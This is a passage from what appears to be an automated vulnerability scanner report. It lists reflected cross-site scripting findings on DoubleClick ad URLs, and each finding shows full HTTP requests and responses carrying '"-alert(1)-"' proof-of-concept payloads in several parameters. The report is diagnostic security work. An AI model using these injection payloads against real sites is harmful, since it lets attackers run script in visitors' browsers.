3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488519f1"-alert(1)-"cc5a0c33515&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99772"-alert(1)-"2b722a970f9 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=11251499772"-alert(1)-"2b722a970f9&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:28 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=11251499772"-alert(1)-"2b722a970f9&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88227"-alert(1)-"fcf0b6f9d7d was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c30653088227"-alert(1)-"fcf0b6f9d7d&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:26:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c30653088227"-alert(1)-"fcf0b6f9d7d&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var op
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613e3"-alert(1)-"21fa9330d9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&613e3"-alert(1)-"21fa9330d9a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6054
Date: Tue, 28 Jun 2011 02:27:04 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
1%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&613e3"-alert(1)-"21fa9330d9a=1http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acb04"-alert(1)-"12c860f5038 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=acb04"-alert(1)-"12c860f5038 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:26:41 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
91%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=467550659312091234&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=acb04"-alert(1)-"12c860f5038http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

1.27. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.5 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8931a"-alert(1)-"96fd3dbaeee was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.5;sz=300x250;ord=467550659312091234;click=http://pixel.mathtag.com/click/img?mt_aid=4675506593120912348931a"-alert(1)-"96fd3dbaeee&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABVLokAAAAAAI.eIgAAAAAAAgDsAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAADCtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAJD1LBetPwAAAAAAAAAAAACQ9SwXrT8AAAAAAAAAAAAAkPUsF60.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKXW1Q4R9SCuVrstP2G564gvxOjglo7qR.DuIZAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D2400098063%26r%3D0%26s%3D1887835,c26ba7ba-a12d-11e0-80d3-8783a7b56898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6042
Date: Tue, 28 Jun 2011 02:25:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/v%3B239209730%3B0-0%3B0%3B62127291%3B4307-300/250%3B39835090/39852877/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=4675506593120912348931a"-alert(1)-"96fd3dbaeee&mt_id=112514&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go125.htm?soa=59796");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.28. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c69f3"-alert(1)-"17b445dd750 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488c69f3"-alert(1)-"17b445dd750&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:51 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488c69f3"-alert(1)-"17b445dd750&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

1.29. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5f09"-alert(1)-"61479ab10b3 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509a5f09"-alert(1)-"61479ab10b3&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:23:25 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
lick.net/click%3Bh%3Dv8/3b34/7/ab/%2a/s%3B239209737%3B0-0%3B0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509a5f09"-alert(1)-"61479ab10b3&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.30. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575a0"-alert(1)-"2dc14e7726b was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530575a0"-alert(1)-"2dc14e7726b&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABQLokAAAAAAHfeIgAAAAAAAgDkAAIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAACjtS0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAHA7a06tPwAAAAAAAAAAAABwO2tOrT8AAAAAAAAAAAAAcDtrTq0.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhX3HBZx9SCugUSM-8gJayF7mxNMV2nhvMny8sAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D797276981%26r%3D0%26s%3D1887835,7a29036c-a12d-11e0-b9a2-5b0ca87794d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6058
Date: Tue, 28 Jun 2011 02:24:18 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B62127587%3B4307-300/250%3B39716205/39733992/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530575a0"-alert(1)-"2dc14e7726b&redirect=http://www.geico.com/landingpage/go140.htm?soa=59798");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var o
...[SNIP]...

1.31. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.8 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6595.317091.MERKLEINC.COM/B5374569.8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96da"-alert(1)-"f7095fb1d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6595.317091.MERKLEINC.COM/B5374569.8;sz=300x250;ord=431024565209792489;click=http://pixel.mathtag.com/click/img?mt_aid=431024565209792489&mt_id=112509&mt_adid=100488&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=&d96da"-alert(1)-"f7095fb1d0a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
